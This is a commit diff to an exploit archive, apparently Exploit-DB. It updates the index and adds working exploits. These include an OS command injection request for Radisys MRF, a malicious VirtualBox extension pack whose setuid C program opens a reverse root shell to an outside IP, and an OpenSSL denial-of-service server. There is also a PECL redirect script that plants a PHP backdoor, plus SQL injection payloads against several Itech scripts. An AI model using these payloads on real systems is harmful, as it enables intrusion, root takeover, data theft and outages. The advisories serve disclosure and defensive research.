41159,platforms/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0
41166,platforms/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
41167,platforms/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
41168,platforms/php/webapps/41168.txt,"KB Messages PHP Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
@ -37112,7 +37114,25 @@ id,file,description,date,author,platform,type,port
41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0
41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41179,platforms/cgi/webapps/41179.txt,"Radisys MRF - Command Injection",2017-01-27,"Filippos Mastrogiannis",cgi,webapps,0
41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0
41185,platforms/php/webapps/41185.txt,"PHP PEAR 1.10.1 - Arbitrary File Download",2017-01-30,hyp3rlinx,php,webapps,0
41186,platforms/php/webapps/41186.txt,"Caregiver Script 2.57 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41187,platforms/php/webapps/41187.txt,"Auction Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41188,platforms/php/webapps/41188.txt,"Itech B2B Script 4.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41189,platforms/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41190,platforms/php/webapps/41190.txt,"Itech Dating Script 3.26 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41191,platforms/php/webapps/41191.txt,"Itech Freelancer Script 5.13 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41193,platforms/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41194,platforms/php/webapps/41194.txt,"Itech News Portal Script 6.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41195,platforms/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41197,platforms/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0
41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

2
platforms/cgi/remote/40949.rb
View file

@ -1,4 +1,6 @@
#
# Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb
#
# Remote code execution in NETGEAR WNR2000v5
# - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
# Released on 20/12/2016

78
platforms/cgi/webapps/41179.txt Executable file
View file

@ -0,0 +1,78 @@
Title: MRF Web Panel OS Command Injection
Vendor: Radisys
Vendor Homepage: http://www.radisys.com
Product: MRF Web Panel (SWMS)
Version: 9.0.1
CVE: CVE-2016-10043
CWE: CWE-78
Risk Level: High
Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
COSMOTE (OTE Group) Information & Network Security
-----------------------------------------------------------------------------------------
Vulnerability Details:
The MRF Web Administration Panel (SWMS) is vulnerable to OS Command Injection
attacks.
Affected parameter: MSM_MACRO_NAME (POST parameter)
Affected file: ms.cgi (/swms/ms.cgi)
Verified Affected Operation: Show Fatal Error and Log Package Configuration
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses.
Proof Of Concept:
The attacker can login to the web panel as a standard user (non-administrator account)
and inject the POST parameter: MSM_MACRO_NAME with the following
payload: Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
As a result the attacker receives the result of the command in the application response
In order to reproduce the vulnerability:
1. Login to the vulnerable MRF SWMS web panel as a standard user (non-administrator):
https://vulnsite.com/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc), set your session id
and send the following POST request in order to retrieve the output of the 'pwd' command:
POST /swms/ms.cgi HTTP/1.1
Host: vulnhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vulnsite/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
3. You can see the output of the command 'pwd' in the server response:
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23
/var/opt/swms/www/html
Vulnerability Impact:
Application's own data and functionality or the web server can be compromised due
to OS command injection vulnerabilities. It may also be possible to use the server
as a platform for attacks against other systems.
Disclaimer:
The responsible disclosure policy has been followed

0
platforms/lin_x86-64/local/40489.txt → platforms/linux/local/40489.txt
View file

192
platforms/linux/local/41196.txt Executable file
View file

@ -0,0 +1,192 @@
== [ Overview ] ===
System affected: VirtualBox
Software-Version: prior to 5.0.32, prior to 5.1.14
User-Interaction: Required
Impact: A Man-In-The-Middle could infiltrate an
Extension-Pack-Update to gain a root-shell
=== [ Detailed description ] ===
In my research about update mechanism of open-source software I found
vulnerabilities in Oracle's VirtualBox. It's possible to compromise a
system behind a firewall by infiltrating the updates of Extension-Packs
because of the following flaws:
1. The Extension-Pack is updated via HTTP instead of HTTPS. The
Extension-Packs are not signed, so a Man-In-The-Middle could send his
own Extension-Pack(with malicious code included) instead of the regular
update to the target. The Code would be executed with user-permissions.
I reported this bug to Oracle but I think someone else discovered and
reported it before. This bug also affects VirtualBox prior to 5.0.32,
prior to 5.1.14. I don't know the CVE.
2. CVE-2017-3316: There is a privilege escalation bug in the downloader
of VirtualBox. Extension-Packs are tar-archives. Tar-archives can
preserve permissions. A Man-In-The-Middle could include an executable
with setuid-permissions to the Extension-Pack. If the victim downloads
the Ext-pack, it will be stored as owner root and without checking the
permissions of the binaries. This bug affects VirtualBox prior to
5.0.32, prior to 5.1.14
=== [ Proof-Of-Concept ] ===
The executeable of the following code is placed in the
Extension-Pack-Archive under linux.amd64/evil with setuid.
/* evil.c(executable with the reverse-shell) */
#include <unistd.h>
int main()
{
setuid(0);
execl("/usr/bin/python","python","-c","import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.12.32.15\",5000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);",NULL);
return 0;
}
The VirtualBox-Sources are downloaded next and the following code has
to be placed under src/VBox/ExtPacks/Evil/VBoxEvilMain.cpp:
/* $Id: VBoxEvilMain.cpp $ */
/** @file
* Evil main module.
*/
/*
* Copyright (C) 2010-2016 Oracle Corporation
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use,
* copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following
* conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
* OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
* HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
* OTHER DEALINGS IN THE SOFTWARE.
*/
#include <VBox/ExtPack/ExtPack.h>
#include <VBox/err.h>
#include <VBox/version.h>
#include <VBox/vmm/cfgm.h>
#include <iprt/string.h>
#include <iprt/param.h>
#include <iprt/path.h>
static PCVBOXEXTPACKHLP g_pHlp;
static const VBOXEXTPACKREG g_vboxEvilExtPackReg =
{
VBOXEXTPACKREG_VERSION,
/* .uVBoxFullVersion = */ VBOX_FULL_VERSION,
/* .pfnInstalled = */ NULL,
/* .pfnUninstall = */ NULL,
/* .pfnVirtualBoxReady =*/ NULL,
/* .pfnConsoleReady = */ NULL,
/* .pfnUnload = */ NULL,
/* .pfnVMCreated = */ NULL,
/* .pfnVMConfigureVMM = */ NULL,
/* .pfnVMPowerOn = */ NULL,
/* .pfnVMPowerOff = */ NULL,
/* .pfnQueryObject = */ NULL,
/* .pfnReserved1 = */ NULL,
/* .pfnReserved2 = */ NULL,
/* .pfnReserved3 = */ NULL,
/* .pfnReserved4 = */ NULL,
/* .pfnReserved5 = */ NULL,
/* .pfnReserved6 = */ NULL,
/* .u32Reserved7 = */ 0,
VBOXEXTPACKREG_VERSION
};
#include <unistd.h>
/** @callback_method_impl{FNVBOXEXTPACKREGISTER} */
extern "C" DECLEXPORT(int) VBoxExtPackRegister(PCVBOXEXTPACKHLP pHlp,
PCVBOXEXTPACKREG *ppReg, PRTERRINFO pErrInfo)
{
pid_t pid = fork();
if(pid == 0)
{
execl("/usr/lib/virtualbox/ExtensionPacks/Oracle_VM_VirtualBox_Extension_Pack/linux.amd64/evil","evil",NULL);
}
/*
* Check the VirtualBox version.
*/
if (!VBOXEXTPACK_IS_VER_COMPAT(pHlp->u32Version,
VBOXEXTPACKHLP_VERSION))
return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
"Helper version mismatch - expected %#x got
%#x",
VBOXEXTPACKHLP_VERSION, pHlp->u32Version);
if ( VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion) !=
VBOX_VERSION_MAJOR
|| VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion) !=
VBOX_VERSION_MINOR)
return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
"VirtualBox version mismatch - expected
%u.%u got %u.%u",
VBOX_VERSION_MAJOR, VBOX_VERSION_MINOR,
VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion),
VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion));
/*
* We're good, save input and return the registration structure.
*/
g_pHlp = pHlp;
*ppReg = &g_vboxEvilExtPackReg;
return VINF_SUCCESS;
}
After compiling, this Extension-Pack-Module is placed in the Archive
under linux.amd64/VBoxEvilMain.so. It's also necessary to modify the
ExtPack.xml so that the Evil-Module is used:
<!--?xml version="1.0"?-->
<virtualboxextensionpack version="1.0"
xmlns="http://www.virtualbox.org/VirtualBoxExtensionPack";>
<name>Oracle VM VirtualBox Extension Pack</name>
<description>USB 2.0 and USB 3.0 Host Controller, Host Webcam,
VirtualBox RDP, PXE ROM, Disk Encryption.</description>
<version revision="112026">5.1.10</version>
<mainmodule>VBoxEvilMain</mainmodule>
<vrdemodule>VBoxVRDP</vrdemodule>
<showlicense>
</showlicense></virtualboxextensionpack>
Note: To make this Extension-Pack valid it is necessary to add all the
file-checksumms to ExtPack.manifest. The victim will be asked for the
root password during the update. If the attacker sends this malicious
Extension-Pack, a reverse root-shell will be executed.
=== [ Timeline ] ===
This bug was reported in December. Oracle answered on the same day and
gave status reports regularly. They released a patch on January 17th.
=== [ Credits ] ===
CVE-2017-3316 was discovered by Wolfgang Hotwagner
(https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316)

212
platforms/multiple/dos/41192.c Executable file
View file

@ -0,0 +1,212 @@
// Source: https://guidovranken.wordpress.com/2017/01/26/cve-2017-3730-openssl-1-1-0-remote-client-denial-of-service-affects-servers-as-well-poc/
/*
* SSL server demonstration program
*
* Copyright (C) 2006-2015, ARM Limited, All Rights Reserved
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* This file is part of mbed TLS (https://tls.mbed.org)
*/
/* Taken from mbed TLS programs/ssl/ssl_server.c and modified to crash postfix.
* Belongs to https://github.com/guidovranken/CVE-2017-3730
*/
#include <stdlib.h>
#include <string.h>
#include "mbedtls/entropy.h"
#include "mbedtls/ctr_drbg.h"
#include "mbedtls/certs.h"
#include "mbedtls/x509.h"
#include "mbedtls/ssl.h"
#include "mbedtls/net_sockets.h"
#include "mbedtls/error.h"
#include "mbedtls/debug.h"
static int write_and_get_response( mbedtls_net_context *sock_fd, char *buf, size_t len )
{
int ret;
if ( (ret = mbedtls_net_send( sock_fd, (unsigned char*)buf, strlen(buf) )) <= 0 )
{
return -1;
}
memset( buf, 0, len );
ret = mbedtls_net_recv( sock_fd, (unsigned char*)buf, len );
return ret;
}
int main( void )
{
int ret;
mbedtls_net_context listen_fd, client_fd;
char buf[1024];
const char *pers = "ssl_server";
int force_ciphersuite[2];
mbedtls_entropy_context entropy;
mbedtls_ctr_drbg_context ctr_drbg;
mbedtls_ssl_context ssl;
mbedtls_ssl_config conf;
mbedtls_x509_crt srvcert;
mbedtls_pk_context pkey;
mbedtls_net_init( &listen_fd );
mbedtls_net_init( &client_fd );
mbedtls_ssl_init( &ssl );
mbedtls_ssl_config_init( &conf );
mbedtls_x509_crt_init( &srvcert );
mbedtls_pk_init( &pkey );
mbedtls_entropy_init( &entropy );
mbedtls_ctr_drbg_init( &ctr_drbg );
ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_srv_crt,
mbedtls_test_srv_crt_len );
if( ret != 0 )
{
goto exit;
}
ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_cas_pem,
mbedtls_test_cas_pem_len );
if( ret != 0 )
{
goto exit;
}
ret = mbedtls_pk_parse_key( &pkey, (const unsigned char *) mbedtls_test_srv_key,
mbedtls_test_srv_key_len, NULL, 0 );
if( ret != 0 )
{
goto exit;
}
if( ( ret = mbedtls_net_bind( &listen_fd, NULL, "8888", MBEDTLS_NET_PROTO_TCP ) ) != 0 )
{
goto exit;
}
if( ( ret = mbedtls_ctr_drbg_seed( &ctr_drbg, mbedtls_entropy_func, &entropy,
(const unsigned char *) pers,
strlen( pers ) ) ) != 0 )
{
goto exit;
}
if( ( ret = mbedtls_ssl_config_defaults( &conf,
MBEDTLS_SSL_IS_SERVER,
MBEDTLS_SSL_TRANSPORT_STREAM,
MBEDTLS_SSL_PRESET_DEFAULT ) ) != 0 )
{
goto exit;
}
mbedtls_ssl_conf_rng( &conf, mbedtls_ctr_drbg_random, &ctr_drbg );
mbedtls_ssl_conf_ca_chain( &conf, srvcert.next, NULL );
if( ( ret = mbedtls_ssl_conf_own_cert( &conf, &srvcert, &pkey ) ) != 0 )
{
goto exit;
}
force_ciphersuite[0] = mbedtls_ssl_get_ciphersuite_id( "TLS-DHE-RSA-WITH-AES-256-GCM-SHA384" );
force_ciphersuite[1] = 0;
mbedtls_ssl_conf_ciphersuites( &conf, force_ciphersuite );
if( ( ret = mbedtls_ssl_setup( &ssl, &conf ) ) != 0 )
{
goto exit;
}
reset:
mbedtls_net_free( &client_fd );
mbedtls_ssl_session_reset( &ssl );
if( ( ret = mbedtls_net_accept( &listen_fd, &client_fd,
NULL, 0, NULL ) ) != 0 )
{
goto exit;
}
sprintf(buf, "220 ok\n");
ret = write_and_get_response( &client_fd, buf, sizeof(buf));
if ( ret < 5 ) {
goto exit;
}
if ( strncmp(buf, "EHLO ", 5) != 0 ) {
goto exit;
}
sprintf(buf, "250-SIZE 157286400\n250-8BITMIME\n250-STARTTLS\n250-ENHANCEDSTATUSCODES\n250-PIPELINING\n250-CHUNKING\n250 SMTPUTF8\n");
ret = write_and_get_response( &client_fd, buf, sizeof(buf));
if ( ret < 8 ) {
goto exit;
}
if ( strncmp(buf, "STARTTLS", 8) != 0 ) {
goto exit;
}
sprintf(buf, "220 ok\n");
ret = mbedtls_net_send( &client_fd, (unsigned char*)buf, strlen(buf) );
if ( ret < 0 ) {
goto exit;
}
mbedtls_ssl_set_bio( &ssl, &client_fd, mbedtls_net_send, mbedtls_net_recv, NULL );
while( ( ret = mbedtls_ssl_handshake( &ssl ) ) != 0 )
{
if( ret != MBEDTLS_ERR_SSL_WANT_READ && ret != MBEDTLS_ERR_SSL_WANT_WRITE )
{
goto reset;
}
}
while( ( ret = mbedtls_ssl_close_notify( &ssl ) ) < 0 )
{
if( ret != MBEDTLS_ERR_SSL_WANT_READ &&
ret != MBEDTLS_ERR_SSL_WANT_WRITE )
{
goto reset;
}
}
ret = 0;
goto reset;
exit:
mbedtls_net_free( &client_fd );
mbedtls_net_free( &listen_fd );
mbedtls_x509_crt_free( &srvcert );
mbedtls_pk_free( &pkey );
mbedtls_ssl_free( &ssl );
mbedtls_ssl_config_free( &conf );
mbedtls_ctr_drbg_free( &ctr_drbg );
mbedtls_entropy_free( &entropy );
return( ret );
}

140
platforms/php/webapps/41185.txt Executable file
View file

@ -0,0 +1,140 @@
[+]#############################################################################################
[+] Credits / Discovery: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt
[+] ISR: ApparitionSEC
[+]#############################################################################################
Vendor:
============
pear.php.net
Product:
===================================
PEAR Base System v1.10.1
PEAR Installer's download utility
Vulnerability Type:
=======================
Arbitrary File Download
CVE Reference:
==============
CVE-2017-5630
Security Issue:
================
The download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect,
which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.
e.g.
pecl download <http://some-vuln-server/file.tgz>
PEAR does not rename the arbitrary invalid file to the originally requested (safe) filename.
Therefore, attackers can overwrite files or download a backdoor if the PECL request is made from from web accesible directory etc..
Moreover, PECL doesn't delete these invalid files upon download, giving the attacker time to exploit it if attackers
can force the HTTP connection to stay open, and before a "invalid file message" is noticed.
POC Video:
https://vimeo.com/201341280
Proof of concept:
This POC involves 3 machines:
First machine is victim making a PECL download command request
Second is the vuln server receiving the file download request
Third is the malicious server hosting the PHP backdoor, .htaccess file etc.
===========================================================================
1) Victim machine attempts to download a legit ".tgz" archive.
pecl download http://VULN-SERVER:8080/Test.tgz
2) VULN-SERVER where the victim is requesting "Test.tgz", and attacker controls HTTP response.
3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php backdoor.
python -m SimpleHTTPServer 8888
On VULN-SERVER run "PECL-File-Exploit.py"
python PECL-File-Exploit.py
import socket
HOST='localhost'
PORT=8080
TARGET='http://EVIL-SERVER:8888/'
FILE='.htaccess'
s = socket.socket()
s.bind((HOST, PORT))
s.listen(10)
print 'Waiting for PECL connections...'
while True:
conn, addr = s.accept()
junk = conn.recv(512)
conn.send('HTTP/1.1 302 Found\r\n')
conn.send('Location: '+TARGET+FILE+'\r\n')
conn.close()
s.close()
Then, make request for Test.tgz...
C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz
downloading Evil.php ...
Starting to download Evil.php (4,665 bytes)
.....done: 4,665 bytes
File C:\xampp\htdocs\webapp\Evil.php downloaded
Disclosure Timeline:
=====================================
Vendor Notification: January 11, 2017
Informed "PECL package no longer maintained" : January 23, 2017
Opened Bug #2117 : January 25, 2017
January 29, 2017 : Public Disclosure
Network Access:
================
Remote
Severity:
=========
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

23
platforms/php/webapps/41186.txt Executable file
View file

@ -0,0 +1,23 @@
Exploit Title: Caregiver Script v2.57 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/caregiver-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Caregiver Script 2.51 is the best solution to launch a portal for hiring people for babysitting and other care giving services in a hassle free manner.
Type of vulnerability:
An SQL Injection vulnerability in Caregiver Script allows attackers to read
arbitrary administrator data from the database.
Vulnerable Url:
http://locahost/searchJob.php?sitterService=1[payload]
Vulnerable parameter : sitterService
Mehod : GET

30
platforms/php/webapps/41187.txt Executable file
View file

@ -0,0 +1,30 @@
Exploit Title: Itech Auction Script v6.49 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/auction-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Auction Script v6.49 is the best standard auction product. This also comes pre-integrated with a robust Multi-Vendor interface and a powerful CMS panel.
Type of vulnerability:
An SQL Injection vulnerability in Itech Auction Script allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://locahost/mcategory.php?mcid=4[payload]
Parameter: mcid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mcid=4' AND 1734=1734 AND 'Ggks'='Ggks
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee

34
platforms/php/webapps/41188.txt Executable file
View file

@ -0,0 +1,34 @@
Exploit Title: Itech B2B Script v4.28 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/b2b-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
B2B Script v4.28 is a versatile web solution for the webmasters who are willing to launch their own B2B Portal within a few minutes.
Type of vulnerability:
An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload]
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA ---

30
platforms/php/webapps/41189.txt Executable file
View file

@ -0,0 +1,30 @@
Exploit Title: Itech Classifieds Script v7.27 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/classifieds-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Classifieds Script v7.27 is the best classifieds software. Try this script and present yourself with a robust digital platform.
Type of vulnerability:
An SQL Injection vulnerability in Classifieds Script v7.27 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://localhost/subpage.php?scat=51[payload]
Parameter: scat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP
Type: UNION query
Title: Generic UNION query (NULL) - 26 columns
Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES

26
platforms/php/webapps/41190.txt Executable file
View file

@ -0,0 +1,26 @@
Exploit Title: Itech Dating Script v3.26 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/dating-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters.
Type of vulnerability:
An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://localhost/see_more_details.php?id=40[payload]
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs

26
platforms/php/webapps/41191.txt Executable file
View file

@ -0,0 +1,26 @@
Exploit Title: Itech Freelancer Script v5.13 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/freelancer-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Itech Freelancer Script v5.13 is the best reverse auction script available online. Just install the product to launch your website within minutes. Please try the product now.
Type of vulnerability:
An SQL Injection vulnerability in Itech Freelancer Script v5.13 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://localhost/category.php?sk=4[payload]
Parameter: sk (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 52 columns
Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL

35
platforms/php/webapps/41193.txt Executable file
View file

@ -0,0 +1,35 @@
Exploit Title: Itech Multi Vendor Script 6.49 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/multi-vendor-shopping-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
